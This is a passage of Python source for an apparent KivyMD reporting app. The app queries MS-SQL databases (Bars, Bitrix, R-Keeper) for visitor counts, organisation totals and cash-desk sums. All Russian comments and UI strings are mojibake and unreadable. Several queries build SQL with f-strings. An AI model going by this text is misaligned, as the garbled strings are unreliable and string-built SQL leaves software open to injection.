ะัะฒะพะดะธั ะพะบะฝะพ ัะพ ัะฟะธัะบะพะผ ะธะผะตััะธั
ัั ัะทัะบะพะฒัั
ะปะพะบะฐะปะธะทะฐัะธะน ะดะปั
ัััะฐะฝะพะฒะบะธ ัะทัะบะฐ ะฟัะธะปะพะถะตะฝะธั.
:param args:
:return:
"""
def select_locale(name_locale):
"""
ะฃััะฐะฝะฐะฒะปะธะฒะฐะตั ะฒัะฑัะฐะฝะฝัั ะปะพะบะฐะปะธะทะฐัะธั.
:param name_locale:
:return:
"""
for locale in self.dict_language.keys():
if name_locale == self.dict_language[locale]:
self.lang = locale
self.config.set('General', 'language', self.lang)
self.config.write()
dict_info_locales = {}
for locale in self.dict_language.keys():
dict_info_locales[self.dict_language[locale]] = \
['locale', locale == self.lang]
if not self.window_language:
self.window_language = card(
Lists(
dict_items=dict_info_locales,
events_callback=select_locale, flag='one_select_check'
),
size=(.85, .55)
)
self.window_language.open()
def dialog_exit(self):
def check_interval_press(interval):
self.exit_interval += interval
if self.exit_interval > 5:
self.exit_interval = False
Clock.unschedule(check_interval_press)
if self.exit_interval:
sys.exit(0)
Clock.schedule_interval(check_interval_press, 1)
toast(self.translation._('Press Back to Exit'))
def show_dialog(self, title, text, func=functions.func_pass, *args, **kwargs):
content = MDLabel(font_style='Body1',
theme_text_color='Secondary',
text=text,
size_hint_y=None,
valign='top')
content.bind(texture_size=content.setter('size'))
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะะฐะบัััั", action=lambda *x: (dialog.dismiss(), func(*args, **kwargs)))
dialog.open()
def show_dialog_variant(self, title, text, func=functions.func_pass, *args, **kwargs):
content = MDLabel(font_style='Body1',
theme_text_color='Secondary',
text=text,
size_hint_y=None,
valign='top')
content.bind(texture_size=content.setter('size'))
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะะ", action=lambda *x: (dialog.dismiss(), func(*args, **kwargs)))
dialog.add_action_button("ะะตั", action=lambda *x: (dialog.dismiss(), False))
dialog.open()
def show_dialog_variant2(self, title, text, func_yes=functions.func_pass, func_no=functions.func_pass):
content = MDLabel(font_style='Body1',
theme_text_color='Secondary',
text=text,
size_hint_y=None,
valign='top')
content.bind(texture_size=content.setter('size'))
dialog = MDDialog(title=title,
content=content,
size_hint=(.8, None),
height=dp(200),
auto_dismiss=False)
dialog.add_action_button("ะะ", action=lambda *x: (dialog.dismiss(), func_yes))
dialog.add_action_button("ะะตั", action=lambda *x: (dialog.dismiss(), func_no))
dialog.open()
def on_lang(self, instance, lang):
self.translation.switch_lang(lang)
def get_time_picker_data(self, instance, time):
self.root.ids.time_picker_label.text = str(time)
self.previous_time = time
def show_time_picker(self):
self.time_dialog = MDTimePicker()
self.time_dialog.bind(time=self.get_time_picker_data)
if self.root.ids.time_picker_use_previous_time.active:
try:
self.time_dialog.set_time(self.previous_time)
except AttributeError:
pass
self.time_dialog.open()
def set_date_from(self, date_obj):
self.previous_date_from = date_obj
self.date_from = datetime.strptime(str(date_obj), '%Y-%m-%d')
self.root.ids.report.ids.date_from.text = str(date_obj)
if self.date_to < self.date_from or self.root.ids.report.ids.date_switch.active:
self.set_date_to(date_obj)
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะฃััะฐะฝะพะฒะบะฐ ะฟะตัะธะพะดะฐ ะพััะตัะฐ ะฝะฐ {self.date_from} - {self.date_to}')
def show_date_from(self):
pd = self.previous_date_from
try:
MDDatePicker(self.set_date_from,
pd.year, pd.month, pd.day).open()
except AttributeError:
MDDatePicker(self.set_date_from).open()
def set_date_to(self, date_obj):
self.previous_date_to = date_obj
self.date_to = datetime.strptime(str(date_obj), '%Y-%m-%d') + timedelta(1)
self.root.ids.report.ids.date_to.text = str(date_obj)
if self.date_to < self.date_from:
self.set_date_from(date_obj)
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะฃััะฐะฝะพะฒะบะฐ ะฟะตัะธะพะดะฐ ะพััะตัะฐ ะฝะฐ {self.date_from} - {self.date_to}')
def show_date_to(self):
if self.root.ids.report.ids.date_switch.active:
pass
else:
pd = self.previous_date_to
try:
MDDatePicker(self.set_date_to,
pd.year, pd.month, pd.day).open()
except AttributeError:
MDDatePicker(self.set_date_to).open()
def click_date_switch(self):
if self.root.ids.report.ids.date_switch.active:
self.date_switch = True
self.root.ids.report.ids.label_date.text = 'ะะฐัะฐ:'
self.set_date_to(self.date_from.date() + timedelta(1))
self.root.ids.report.ids.date_to.theme_text_color = 'Secondary'
self.root.ids.report.ids.split_by_days.active = False
self.root.ids.report.ids.split_by_days.disabled = True
self.root.ids.report.ids.split_by_days_text.theme_text_color = 'Secondary'
self.change_checkbox('split_by_days', False)
self.root.ids.report.ids.finreport_google_text.disabled = False
self.root.ids.report.ids.finreport_google.disabled = False
else:
self.date_switch = False
self.root.ids.report.ids.label_date.text = 'ะะตัะธะพะด:'
self.root.ids.report.ids.date_to.theme_text_color = 'Primary'
self.root.ids.report.ids.split_by_days.disabled = False
self.root.ids.report.ids.split_by_days.active = True
self.root.ids.report.ids.split_by_days_text.theme_text_color = 'Primary'
self.change_checkbox('split_by_days', True)
def count_clients(
self,
driver,
server,
database,
uid,
pwd,
):
"""
ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะฒ ะทะพะฝะต
:return: ะะพะปะธัะตััะฒะพ ัะตะปะพะฒะตะบ ะฒ ะทะพะฝะต
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟะพะปะฝะตะฝะธะต ััะฝะบัะธะธ "count_clients"')
result = []
try:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟััะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}')
cnxn = pyodbc.connect(
f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
cursor = cnxn.cursor()
cursor.execute("""
SELECT
[gr].[c1] as [c11],
[gr].[StockCategory_Id] as [StockCategory_Id1],
[c].[Name],
[c].[NN]
FROM
(
SELECT
[_].[CategoryId] as [StockCategory_Id],
Count(*) as [c1]
FROM
[AccountStock] [_]
INNER JOIN [SuperAccount] [t1] ON [_].[SuperAccountId] = [t1].[SuperAccountId]
WHERE
[_].[StockType] = 41 AND
[t1].[Type] = 0 AND
[_].[Amount] > 0 AND
NOT ([t1].[IsStuff] = 1)
GROUP BY
[_].[CategoryId]
) [gr]
INNER JOIN [Category] [c] ON [gr].[StockCategory_Id] = [c].[CategoryId]
""")
while True:
row = cursor.fetchone()
if row:
result.append(row)
else:
break
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะ ะตะทัะปััะฐั ััะฝะบัะธะธ "count_clients": {result}')
if not result:
result.append(('ะัััะพ', 488, '', '0003'))
except pyodbc.OperationalError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
result.append(('ะะตั ะดะฐะฝะฝัั
', 488, 'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั', repr(e)))
self.show_dialog(f'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}: {database}', repr(e))
except pyodbc.ProgrammingError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
result.append(('ะะตั ะดะฐะฝะฝัั
', 488, 'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั', repr(e)))
self.show_dialog(f'ะะตะฒะพะทะผะพะถะฝะพ ะพัะบัััั {database}', repr(e))
return result
def count_clients_print(self):
in_zone = self.count_clients(
driver=self.driver,
server=self.server,
database=self.database1,
uid=self.user,
pwd=self.pwd,
)
self.click_select_org()
try:
count_clients = int(self.itog_report(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
org_name=self.org1[1],
date_from=datetime.now(),
date_to=datetime.now()+timedelta(1),
hide_zeroes='0',
hide_internal='1',
)['ะะบะฒะฐะทะพะฝะฐ'][0])
except KeyError:
count_clients = 0
try:
count_clients_allday = self.reportClientCountTotals(
server=self.server,
database=self.database1,
driver=self.driver,
user=self.user,
pwd=self.pwd,
org=self.org1[0],
date_from=datetime.now(),
date_to=datetime.now() + timedelta(1),
)[0][1]
except IndexError:
count_clients_allday = 0
self.screen.ids.base.ids.count_clients.text = str(count_clients) + ' / ' + str(count_clients_allday)
self.screen.ids.base.ids.name_zone.text = str(in_zone[len(in_zone) - 1][2])
self.screen.ids.base.ids.count.text = str(in_zone[len(in_zone) - 1][0])
# -------------------------------ะะฝะพะฟะบะธ ะฒัะฒะพะดะฐ ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน ะดะปั ะฒัะฑะพัะฐ----------------------------------------
# def select_org1(self):
# """
# ะัะฒะพะด ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน
# :return:
# """
# org_list = self.list_organisation(
# server=self.server,
# database=self.database1,
# uid=self.user,
# pwd=self.pwd,
# driver=self.driver,
# )
# if org_list:
# bs = MDListBottomSheet()
# for org in org_list:
# bs.add_item(org[2], lambda x: self.click_select_org(org[0], org[2], self.database1), icon='nfc')
# bs.open()
#
# def select_org2(self):
# """
# ะัะฒะพะด ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน
# :return:
# """
# org_list = self.list_organisation(
# server=self.server,
# database=self.database2,
# uid=self.user,
# pwd=self.pwd,
# driver=self.driver,
# )
# if org_list:
# bs = MDListBottomSheet()
# for org in org_list:
# bs.add_item(org[2], lambda x: self.click_select_org(org[0], org[2], self.database2), icon='nfc')
# bs.open()
#
# def click_select_org(self, id, name, database):
# """
# ะัะฑะพั ะพัะณะฐะฝะธะทะฐัะธะธ ะธะท ัะฟะธัะบะฐ ะธ ะทะฐะฟะธัั ะตะต ะฒ ะฟะตัะตะผะตะฝะฝัั
# :param id:
# :param name:
# :param database:
# :return:
# """
# if database == self.database1:
# self.org1 = (id, name)
# self.screen.ids.report.ids.org1.text = name
# elif database == self.database2:
# self.org2 = (id, name)
# self.screen.ids.report.ids.org2.text = name
# ---------- ะัะฑะพั ะฟะตัะฒะพะน ะพัะณะฐะฝะธะทะฐัะธะธ ะธะท ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน (ะะฐะผะตะฝะฐ ะบะฝะพะฟะบะฐะผ ะฒัะฑะพัะฐ ะพัะณะฐะฝะธะทะฐัะธะน) --------------------
def click_select_org(self):
"""
ะัะฑะพั ะฟะตัะฒะพะน ะพัะณะฐะฝะธะทะฐัะธะธ ะธะท ัะฟะธัะบะฐ ะพัะณะฐะฝะธะทะฐัะธะน
"""
org_list1 = self.list_organisation(
server=self.server,
database=self.database1,
uid=self.user,
pwd=self.pwd,
driver=self.driver,
)
org_list2 = self.list_organisation(
server=self.server,
database=self.database2,
uid=self.user,
pwd=self.pwd,
driver=self.driver,
)
for org in org_list1:
if org[0] == 36:
self.org1 = (org[0], org[2])
if org[0] == 7203673:
self.org3 = (org[0], org[2])
self.org2 = (org_list2[0][0], org_list2[0][2])
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฑัะฐะฝั ะพัะณะฐะฝะธะทะฐัะธะธ {org_list1[0][2]} ะธ {org_list2[0][2]}')
def list_organisation(self,
server,
database,
uid,
pwd,
driver,
):
"""
ะคัะฝะบัะธั ะดะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั ะะฐัั ะธ ะฒะพะทะฒัะฐัะฐะตั ัะฟะธัะพะบ ะทะฐะฒะตะดะตะฝะฝัั
ะฒ ะฑะฐะทะต ะพัะณะฐะฝะธะทะฐัะธะน ะฒ ะฒะธะดะต ัะฟะธัะบะฐ ะบะพััะตะถะตะน
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
ะะฐััะฐ, ะฝะฐะฟัะธะผะตั 'SkiBars2'
:param uid: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:return: list = ะกะฟะธัะพะบ ะพัะณะฐะฝะธะทะฐัะธะน, ะบะฐะดะถะฐั ะธะท ะบะพัะพััั
- ะบะพััะตะถ ั ะฟะฐัะฐะผะตััะฐะผะธ ะพัะณะฐะฝะธะทะฐัะธะธ
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะธัะบ ะพัะณะฐะฝะธะทะฐัะธะน...')
result = []
try:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะะพะฟััะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}')
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={uid};PWD={pwd}')
cursor = cnxn.cursor()
id_type = 1
cursor.execute(
f"""
SELECT
SuperAccountId, Type, Descr, CanRegister, CanPass, IsStuff, IsBlocked, BlockReason, DenyReturn,
ClientCategoryId, DiscountCard, PersonalInfoId, Address, Inn, ExternalId, RegisterTime,LastTransactionTime,
LegalEntityRelationTypeId, SellServicePointId, DepositServicePointId, AllowIgnoreStoredPledge, Email,
Latitude, Longitude, Phone, WebSite, TNG_ProfileId
FROM
SuperAccount
WHERE
Type={id_type}
""")
while True:
row = cursor.fetchone()
if row:
result.append(row)
else:
break
except pyodbc.OperationalError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
self.show_dialog(f'ะัะธะฑะบะฐ ัะพะตะดะธะฝะตะฝะธั ั {server}: {database}', repr(e))
except pyodbc.ProgrammingError as e:
logging.error(f'{__name__}: {str(datetime.now())[:-7]}: ะัะธะฑะบะฐ {repr(e)}')
self.show_dialog(f'ะะตะฒะพะทะผะพะถะฝะพ ะพัะบัััั {database}', repr(e))
return result
@functions.to_googleshet
@functions.add_date
@functions.add_sum
@functions.convert_to_dict
def itog_report(
self,
server,
database,
driver,
user,
pwd,
org,
org_name,
date_from,
date_to,
hide_zeroes='0',
hide_internal='1',
):
"""
ะะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั ะะฐัั ะธ ะฒะพะทะฒัะฐัะฐะตั ะธัะพะณะพะฒัะน ะพััะตั ะทะฐ ะทะฐะฟัะฐัะธะฒะฐะตะผัะน ะฟะตัะธะพะด
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
ะะฐััะฐ, ะฝะฐะฟัะธะผะตั 'SkiBars2'
:param uid: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:param sa: str - Id ะพัะณะฐะฝะธะทะฐัะธะธ ะฒ ะะฐััะต
:param date_from: str - ะะฐัะฐะปะพ ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:param date_to: str - ะะพะฝะตั ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:param hide_zeroes: 0 or 1 - ะกะบััะฒะฐัั ะฝัะปะตะฒัะต ะฟะพะทะธัะธะธ?
:param hide_internal: 0 or 1 - ะกะบััะฒะฐัั ะฒะฝัััะตะฝะฝะธะต ัะพัะบะธ ะพะฑัะปัะถะธะฒะฐะฝะธั?
:return: ะัะพะณะพะฒัะน ะพััะตั
"""
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
date_from = date_from.strftime('%Y%m%d 00:00:00')
date_to = date_to.strftime('%Y%m%d 00:00:00')
cursor = cnxn.cursor()
cursor.execute(
f"exec sp_reportOrganizationTotals_v2 @sa={org},@from='{date_from}',@to='{date_to}',@hideZeroes={hide_zeroes},"
f"@hideInternal={hide_internal}")
report = []
while True:
row = cursor.fetchone()
if row:
report.append(row)
else:
break
report.append((0, 0, 0, 0, org_name, 0, 'ะัะณะฐะฝะธะทะฐัะธั', 'ะัะณะฐะฝะธะทะฐัะธั'))
report.append((0, 0, 0, 0, str(org), 0, 'ID ะพัะณะฐะฝะธะทะฐัะธะธ', 'ID ะพัะณะฐะฝะธะทะฐัะธะธ'))
if len(report) > 1:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะพะณะพะฒัะน ะพััะตั ััะพัะผะธัะพะฒะฐะฝ ID ะพัะณะฐะฝะธะทะฐัะธะธ = {org}, '
f'ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}, ะกะบััะฒะฐัั ะฝัะปะธ = {hide_zeroes}, .'
f'ะกะบััะฒะฐัั ะฒะฝัััะตะฝะฝะธะต ัะพัะบะธ ะพะฑัะปัะถะธะฒะฐะฝะธั: {hide_internal})')
return report
def reportClientCountTotals(
self,
server,
database,
driver,
user,
pwd,
org,
date_from,
date_to,
):
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
date_from = date_from.strftime('%Y%m%d 00:00:00')
date_to = date_to.strftime('%Y%m%d 00:00:00')
cursor = cnxn.cursor()
cursor.execute(
f"exec sp_reportClientCountTotals @sa={org},@from='{date_from}',@to='{date_to}',@categoryId=0")
report = []
while True:
row = cursor.fetchone()
if row:
report.append(row)
else:
break
if len(report) > 1:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะััะตั ะฟะพ ะบะพะปะธัะตััะฒั ะฟะพัะตัะธัะตะปะตะน ััะพัะผะธัะพะฒะฐะฝ '
f'ID ะพัะณะฐะฝะธะทะฐัะธะธ = {org}, ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}')
return report
def client_count_totals_period(
self,
server,
database,
driver,
user,
pwd,
org,
org_name,
date_from,
date_to,
):
"""
ะัะปะธ ะฒัะฑัะฐะฝ 1 ะดะตะฝั ะฒะพะทะฒัะฐัะฐะตั ัะปะพะฒะฐัั ะบะพะปะธัะตััะฒะฐ ะปัะดะตะน ะทะฐ ัะตะบััะธะน ะผะตััั,
ะตัะปะธ ะฒัะฑัะฐะฝ ะฟะตัะธะพะด ะฒะพะทะฒัะฐัะฐะตั ัะปะพะฒะฐัั ะบะพะปะธัะตััะฒะฐ ะปัะดะตะน ะทะฐ ะฟะตัะธะพะด
"""
count = []
if date_from + timedelta(1) == date_to:
first_day = datetime.strptime((date_from.strftime('%Y%m') + '01'), '%Y%m%d')
count.append((org_name, 1))
else:
first_day = date_from
count.append((org_name, 0))
total = 0
while first_day < date_to:
client_count = self.reportClientCountTotals(
server=server,
database=database,
driver=driver,
user=user,
pwd=pwd,
org=org,
date_from=first_day,
date_to=first_day + timedelta(1),
)
try:
count.append((client_count[0][0], client_count[0][1]))
total += client_count[0][1]
except IndexError:
count.append((first_day, 0))
first_day += timedelta(1)
count.append(('ะัะพะณะพ', total))
return count
def cash_report_request(
self,
server,
database,
driver,
user,
pwd,
date_from,
date_to,
):
"""
ะะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั ะะฐัั ะธ ะฒะพะทะฒัะฐัะฐะตั ััะผะผะพะฒะพะน ะพััะตั ะทะฐ ะทะฐะฟัะฐัะธะฒะฐะตะผัะน ะฟะตัะธะพะด
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
ะะฐััะฐ, ะฝะฐะฟัะธะผะตั 'SkiBars2'
:param uid: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:param sa: str - Id ะพัะณะฐะฝะธะทะฐัะธะธ ะฒ ะะฐััะต
:param date_from: str - ะะฐัะฐะปะพ ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:param date_to: str - ะะพะฝะตั ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:return: ะกัะผะผะพะฒะพะน ะพััะตั
"""
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
date_from = date_from.strftime('%Y%m%d 00:00:00')
date_to = date_to.strftime('%Y%m%d 00:00:00')
cursor = cnxn.cursor()
cursor.execute(
f"exec sp_reportCashDeskMoney @from='{date_from}', @to='{date_to}'")
report = []
while True:
row = cursor.fetchone()
if row:
report.append(row)
else:
break
if len(report) > 1:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกัะผะผะพะฒะพะน ะพััะตั ััะพัะผะธัะพะฒะฐะฝ, '
f'ะะตัะธะพะด: {date_from[:8]}-{date_to[:8]}')
return report
def service_point_request(
self,
server,
database,
driver,
user,
pwd,
):
"""
ะะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั ะะฐัั ะธ ะฒะพะทะฒัะฐัะฐะตั ัะฟะธัะพะบ ัะฐะฑะพัะธั
ะผะตัั
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
ะะฐััะฐ, ะฝะฐะฟัะธะผะตั 'SkiBars2'
:param uid: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:param sa: str - Id ะพัะณะฐะฝะธะทะฐัะธะธ ะฒ ะะฐััะต
:return: ะกัะผะผะพะฒะพะน ะพััะตั
"""
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
cursor = cnxn.cursor()
cursor.execute(
f"""
SELECT
ServicePointId, Name, SuperAccountId, Type, Code, IsInternal
FROM
ServicePoint
"""
)
report = []
while True:
row = cursor.fetchone()
if row:
report.append(row)
else:
break
if len(report) > 1:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะฟะธัะพะบ ัะฐะฑะพัะธั
ะผะตัั ััะพัะผะธัะพะฒะฐะฝ.')
return report
def cashdesk_report(
self,
server,
database,
driver,
user,
pwd,
date_from,
date_to,
):
"""
ะัะตะพะฑัะฐะทัะตั ะทะฐะฟัะพัั ะธะท ะฑะฐะทั ะฒ ััะผะผะพะฒะพะน ะพััะตั
:return: dict
"""
cash_report = self.cash_report_request(
server=server,
database=database,
driver=driver,
user=user,
pwd=pwd,
date_from=date_from,
date_to=date_to,
)
service_point = self.service_point_request(
server=server,
database=database,
driver=driver,
user=user,
pwd=pwd,
)
service_point_dict = {}
for point in service_point:
service_point_dict[point[0]] = (point[1], point[2], point[3], point[4], point[5])
report = {}
for line in cash_report:
report[line[8]] = []
for line in cash_report:
report[line[8]].append([service_point_dict[line[0]][0], line[1], line[2], line[3], line[4], line[5], line[6], line[7]])
all_sum = ['ะัะพะณะพ ะฟะพ ะพััะตัั', Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0)]
for typpe in report:
type_sum = ['ะัะพะณะพ', Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0), Decimal(0.0)]
for line in report[typpe]:
i = 0
while True:
i += 1
try:
type_sum[i] += line[i]
all_sum[i] += line[i]
except IndexError:
break
report[typpe].append(type_sum)
report['ะัะพะณะพ'] = [all_sum]
report['ะะฐัะฐ'] = [[date_from, date_to]]
if database == self.database1:
report['ะัะณะฐะฝะธะทะฐัะธั'] = [[self.org1[1]]]
elif database == self.database2:
report['ะัะณะฐะฝะธะทะฐัะธั'] = [[self.org2[1]]]
return report
def read_bitrix_base(self,
server,
database,
user,
pwd,
driver,
date_from,
date_to,
):
"""
ะคัะฝะบัะธั ะดะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั ะธ ะฒะพะทะฒัะฐัะฐะตั ัะฟะธัะพะบ ะฟัะพะดะฐะถ ะทะฐ ะฐะบะฐะทะฐะฝะฝัั ะดะฐัั
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
ะะฐััะฐ, ะฝะฐะฟัะธะผะตั 'SkiBars2'
:param uid: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:param date_from: str - ะะฐัะฐะปะพ ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:param date_to: str - ะะพะฝะตั ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:return: list = ะกะฟะธัะพะบ ะพัะณะฐะฝะธะทะฐัะธะน, ะบะฐะดะถะฐั ะธะท ะบะพัะพััั
- ะบะพััะตะถ ั ะฟะฐัะฐะผะตััะฐะผะธ ะพัะณะฐะฝะธะทะฐัะธะธ
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะงัะตะฝะธะต online-ะฟัะพะดะฐะถ...')
date_from = date_from.strftime("%Y%m%d") + " 00:00:00"
date_to = date_to.strftime("%Y%m%d") + " 00:00:00"
cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={user};PWD={pwd}')
cursor = cnxn.cursor()
cursor.execute(
f"""
SELECT
Id, OrderNumber, ProductId, ProductName, OrderDate, PayDate, Sum, Pay, Status, Client
FROM
Transactions
WHERE
(PayDate >= '{date_from}')and(PayDate < '{date_to}')
""")
orders = []
while True:
row = cursor.fetchone()
if row:
orders.append(row)
else:
break
summ = 0
for order in orders:
summ += float(order[6])
return len(orders), summ
def read_reportgroup(self, XML):
"""
ะงัะตะฝะธะต XML ั ะฟัะธะฒัะทะบะพะน ะณััะฟะฟ ััะปัะณ ะบ ััะปัะณะฐะผ
:param path:
:return:
"""
with open(XML, encoding='utf-8') as f:
xml = f.read()
root = objectify.fromstring(xml)
orgs_dict = {}
for org in root.UrFace:
orgs_dict[org.get('Name')] = []
for serv in org.Services.Service:
if serv.get('Name') != 'ะัััะฐั ะพะฑัะทะฐัะตะปัะฝะฐั ะบะฐัะตะณะพัะธั':
orgs_dict[org.get('Name')].append(serv.get('Name'))
return orgs_dict
@staticmethod
def rk_report_request(
server: str,
database: str,
driver: str,
user: str,
pwd: str,
cash_id: int,
date_from: datetime,
date_to: datetime,
) -> List[Dict[str, Any]]:
"""
ะะตะปะฐะตั ะทะฐะฟัะพั ะฒ ะฑะฐะทั R-Keeper ะธ ะฒะพะทะฒัะฐัะฐะตั ะฟัะพะดะฐะถะธ ะบะฐััั cash_id ะทะฐ ะทะฐะฟัะฐัะธะฒะฐะตะผัะน ะฟะตัะธะพะด
:param server: str - ะััั ะดะพ MS-SQL ัะตัะฒะตัะฐ, ะฝะฐะฟัะธะผะตั 'SQLEXPRESS\BASE'
:param database: str - ะะผั ะฑะฐะทั ะดะฐะฝะฝัั
R-Keeper, ะฝะฐะฟัะธะผะตั 'RK7'
:param driver: str - ะัะฐะนะฒะตั ะฑะฐะทั ะดะฐะฝะฝัั
:param user: str - ะะผั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'sa'
:param pwd: str - ะะฐัะพะปั ะฟะพะปัะทะพะฒะฐัะตะปั ะฑะฐะทั ะดะฐะฝะฝัั
, ะฝะฐะฟัะธะผะตั 'pass'
:param cash_id: int - Id ะบะฐััั R-Keeper
:param date_from: datetime - ะะฐัะฐะปะพ ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:param date_to: datetime - ะะพะฝะตั ะพััะตัะฝะพะณะพ ะฟะตัะธะพะดะฐ ะฒ ัะพัะผะฐัะต: 'YYYYMMDD 00:00:00'
:return: {
'station_id': int,
